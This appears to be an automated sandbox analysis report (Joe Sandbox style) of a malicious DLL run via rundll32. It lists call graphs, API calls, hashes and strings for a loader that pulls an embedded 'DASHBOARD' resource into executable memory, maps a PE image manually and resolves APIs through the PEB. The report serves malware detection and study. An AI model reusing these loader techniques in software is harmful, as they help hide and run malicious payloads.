31944->32017 31948 10030b1c 32005 100387ae 72 API calls 3 library calls 31948->32005 31949 10030bde GetCurrentThreadId 31949->31928 31951 10030b26 31952 10030b2a 31951->31952 32007 10038cad 111 API calls 3 library calls 31951->32007 32006 10035178 70 API calls 2 library calls 31952->32006 31955 10030b36 31957 10030b4a 31955->31957 32008 10038a3a 110 API calls 6 library calls 31955->32008 32003 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31956->32003 31962 10030b02 31957->31962 32010 100389ee 68 API calls ___wtomb_environ 31957->32010 31960 10030b3f 31960->31957 32009 10030f4d 75 API calls 4 library calls 31960->32009 31962->31928 32056 10006a90 31963->32056 31966 1001265a 32090 1002fe65 105 API calls 6 library calls 31966->32090 31967 1001261c FindResourceW LoadResource SizeofResource 31970 10006a90 ___DllMainCRTStartup 67 API calls 31967->31970 31973 10012744 ___DllMainCRTStartup 31970->31973 31972 1001284d 31972->31902 31972->31904 31974 100127b7 VirtualAlloc 31973->31974 31975 1001279b VirtualAllocExNuma 31973->31975 31976 100127da 31974->31976 31975->31976 32061 1002fb00 31976->32061 31980 100127fa 32084 10002970 31980->32084 31982 10012810 ___DllMainCRTStartup 32087 100026a0 31982->32087 31984 10012664 32091 1002f81e 5 API calls __invoke_watson 31984->32091 31986 10036647 31985->31986 31987 10036644 31985->31987 32031 100365c9 67 API calls 2 library calls 31986->32031 31987->31929 31989 1003664c 31990 10036656 31989->31990 31991 1003667a 31989->31991 32032 10035aca HeapAlloc 31990->32032 31991->31929 31993 10036660 31993->31991 31994 10036665 HeapDestroy 31993->31994 31994->31987 31995->31923 31997 10035844 31996->31997 31999 10030bb2 31997->31999 32000 10035864 Sleep 31997->32000 32033 10030678 31997->32033 31999->31928 31999->31935 32001 10035879 32000->32001 32001->31997 32001->31999 32002->31937 32003->31962 32004->31948 32005->31951 32006->31956 32007->31955 32008->31960 32009->31957 32010->31952 32011->31921 32012->31930 32013->31938 32014->31928 32015->31939 32016->31949 32019 1002fa75 ___BuildCatchObjectHelper 32017->32019 32018 1002faee _realloc ___BuildCatchObjectHelper 32018->31962 32019->32018 32029 1002fab4 32019->32029 32052 10035a99 67 API calls 2 library calls 32019->32052 32020 1002fac9 HeapFree 32020->32018 32022 1002fadb 32020->32022 32055 100311f4 67 API calls __getptd_noexit 32022->32055 32024 1002fae0 GetLastError 32024->32018 32025 1002faa6 32054 1002fabf LeaveCriticalSection _doexit 32025->32054 32026 1002fa8c ___sbh_find_block 32026->32025 32053 10035b3d VirtualFree VirtualFree HeapFree __fptostr 32026->32053 32029->32018 32029->32020 32030->31928 32031->31989 32032->31993 32034 10030684 ___BuildCatchObjectHelper 32033->32034 32035 1003069c 32034->32035 32045 100306bb _memset 32034->32045 32046 100311f4 67 API calls __getptd_noexit 32035->32046 32037 100306a1 32047 10037753 4 API calls 2 library calls 32037->32047 32039 1003072d RtlAllocateHeap 32039->32045 32042 100306b1 ___BuildCatchObjectHelper 32042->31997 32045->32039 32045->32042 32048 10035a99 67 API calls 2 library calls 32045->32048 32049 100362e6 5 API calls 2 library calls 32045->32049 32050 10030774 LeaveCriticalSection _doexit 32045->32050 32051 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32045->32051 32046->32037 32048->32045 32049->32045 32050->32045 32051->32045 32052->32026 32053->32025 32054->32029 32055->32024 32057 1002f9a6 _malloc 67 API calls 32056->32057 32058 10006aa1 32057->32058 32059 1002fa69 ___wtomb_environ 67 API calls 32058->32059 32060 10006aad 32058->32060 32059->32060 32060->31966 32060->31967 32062 1002fb18 32061->32062 32063 1002fb3f __VEC_memcpy 32062->32063 32064 100127eb 32062->32064 32063->32064 32065 1002f9a6 32064->32065 32066 1002fa53 32065->32066 32077 1002f9b4 32065->32077 32099 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32066->32099 32068 1002fa59 32100 100311f4 67 API calls __getptd_noexit 32068->32100 32071 1002fa5f 32071->31980 32074 1002fa17 RtlAllocateHeap 32074->32077 32075 1002f9c9 32075->32077 32092 10036892 67 API calls 2 library calls 32075->32092 32093 100366f2 67 API calls 7 library calls 32075->32093 32094 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32075->32094 32077->32074 32077->32075 32078 1002fa4a 32077->32078 32079 1002fa3e 32077->32079 32082 1002fa3c 32077->32082 32095 1002f957 67 API calls 4 library calls 32077->32095 32096 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32077->32096 32078->31980 32097 100311f4 67 API calls __getptd_noexit 32079->32097 32098 100311f4 67 API calls __getptd_noexit 32082->32098 32085 1002f9a6 _malloc 67 API calls 32084->32085 32086 10002990 32085->32086 32086->31982 32101 10002280 32087->32101 32090->31984 32091->31972 32092->32075 32093->32075 32095->32077 32096->32077 32097->32082 32098->32078 32099->32068 32100->32071 32138 10001990 32101->32138 32104 100022c3 SetLastError 32135 100022a9 32104->32135 32105 100022d5 32106 10001990 ___DllMainCRTStartup SetLastError 32105->32106 32107 100022ee 32106->32107 32108 10002310 SetLastError 32107->32108 32109 10002322 32107->32109 32107->32135 32108->32135 32110 10002331 SetLastError 32109->32110 32111 10002343 32109->32111 32110->32135 32112 1000234e SetLastError 32111->32112 32114 10002360 GetNativeSystemInfo 32111->32114 32112->32135 32115 10002414 SetLastError 32114->32115 32116 10002426 VirtualAlloc 32114->32116 32115->32135 32117 10002472 GetProcessHeap HeapAlloc 32116->32117 32118 10002447 VirtualAlloc 32116->32118 32120 100024ac 32117->32120 32121 1000248c VirtualFree SetLastError 32117->32121 32118->32117 32119 10002463 SetLastError 32118->32119 32119->32135 32122 10001990 ___DllMainCRTStartup SetLastError 32120->32122 32121->32135 32123 1000250e 32122->32123 32124 10002512 32123->32124 32125 1000251c VirtualAlloc 32123->32125 32176 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32124->32176 32126 1000254b ___DllMainCRTStartup 32125->32126 32141 100019c0 32126->32141 32129 1000257f ___DllMainCRTStartup 32129->32124 32151 10001ff0 32129->32151 32133 100025e8 ___DllMainCRTStartup 32133->32124 32133->32135 32170 35e991 32133->32170 32135->31984 32136 1000264f SetLastError 32136->32124 32139 100019ab 32138->32139 32140 1000199f SetLastError 32138->32140 32139->32104 32139->32105 32139->32135 32140->32139 32142 100019f0 32141->32142 32143 10001a83 32142->32143 32145 10001a2c VirtualAlloc 32142->32145 32150 10001aa0 ___DllMainCRTStartup 32142->32150 32144 10001990 ___DllMainCRTStartup SetLastError 32143->32144 32146 10001a9c 32144->32146 32147 10001a50 32145->32147 32148 10001a57 ___DllMainCRTStartup 32145->32148 32149 10001aa4 VirtualAlloc 32146->32149 32146->32150 32147->32150 32148->32142 32149->32150 32150->32129 32152 10002029 IsBadReadPtr 32151->32152 32161 1000201f 32151->32161 32154 10002053 32152->32154 32152->32161 32155 10002085 SetLastError 32154->32155 32156 10002099 32154->32156 32154->32161 32155->32161 32177 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32156->32177 32158 100020b3 32159 100020bf SetLastError 32158->32159 32162 100020e9 32158->32162 32159->32161 32161->32124 32164 10001cb0 32161->32164 32162->32161 32163 100021f9 SetLastError 32162->32163 32163->32161 32165 10001cf8 ___DllMainCRTStartup 32164->32165 32166 10001e01 32165->32166 32168 10001ddd 32165->32168 32178 10001b80 32165->32178 32167 10001b80 ___DllMainCRTStartup 2 API calls 32166->32167 32167->32168 32168->32133 32171 35ea62 32170->32171 32175 35ea8d 32170->32175 32185 35f8fd 32171->32185 32175->32135 32175->32136 32176->32135 32177->32158 32179 10001b9c 32178->32179 32181 10001b92 32178->32181 32180 10001baa 32179->32180 32183 10001c04 VirtualProtect 32179->32183 32180->32181 32184 10001be2 VirtualFree 32180->32184 32181->32165 32183->32181 32184->32181 32195 35fde0 32185->32195 32186 35ffd1 32209 35ab87 32186->32209 32189 35ea75 32189->32175 32198 3593ed 32189->32198 32192 36dcf7 GetPEB 32192->32195 32195->32186 32195->32189 32195->32192 32197 35a8b0 GetPEB 32195->32197 32201 35b23c 32195->32201 32205 3646bb 32195->32205 32219 36da22 GetPEB 32195->32219 32220 3547ce GetPEB 32195->32220 32221 35f899 GetPEB 32195->32221 32222 354b61 32195->32222 32197->32195 32199 36aa30 GetPEB 32198->32199 32200 359456 ExitProcess 32199->32200 32200->32175 32202 35b254 32201->32202 32226 36aa30 32202->32226 32206 3646da 32205->32206 32207 36aa30 GetPEB 32206->32207 32208 364729 SHGetFolderPathW 32207->32208 32208->32195 32210 35abb0 32209->32210 32211 354b61 GetPEB 32210->32211 32212 35ad67 32211->32212 32234 357f5d 32212->32234 32214 35ad99 32215 35ada4 32214->32215 32238 361e67 GetPEB 32214->32238 32215->32189 32217 35adc4 32239 361e67 GetPEB 32217->32239 32219->32195 32220->32195 32221->32195 32223 354b74 32222->32223 32240 351ea7 32223->32240 32227 35b2b8 lstrcmpiW 32226->32227 32228 36ab1d 32226->32228 32227->32195 32232 360a0e GetPEB 32228->32232 32230 36ab33 32233 35cdcd GetPEB 32230->32233 32232->32230 32233->32227 32235 357f8e 32234->32235 32236 36aa30 GetPEB 32235->32236 32237 357fd4 CreateProcessW 32236->32237 32237->32214 32238->32217 32239->32215 32241 351ebc 32240->32241 32244 35702c 32241->32244 32245 357049 32244->32245 32246 36aa30 GetPEB 32245->32246 32247 351f4c 32246->32247 32247->32195

                                                                                                                    Executed Functions

                                                                                                                    Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                    • _printf.LIBCMT ref: 1001265F
                                                                                                                    • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                    • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                    • _malloc.LIBCMT ref: 100127F5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                    • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                    • API String ID: 572389289-2839844625
                                                                                                                    • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                    • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                    • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                    • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 35e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                    • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                    • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                    • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                    • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                      • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                      • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 501242067-0
                                                                                                                    • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                    • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                    • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                    • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                    • GlobalHandle.KERNEL32(00827AC0), ref: 100208A9
                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                    • GlobalHandle.KERNEL32(00827AC0), ref: 100208DB
                                                                                                                    • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                    • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                    • _memset.LIBCMT ref: 10020911
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 496899490-0
                                                                                                                    • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                    • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                    • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                    • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 1002FA87
                                                                                                                      • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                      • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                      • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                    • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                    • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2714421763-0
                                                                                                                    • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                    • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                    • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                    • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                    APIs
                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3296620671-0
                                                                                                                    • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                    • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                    • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                    • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                    • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
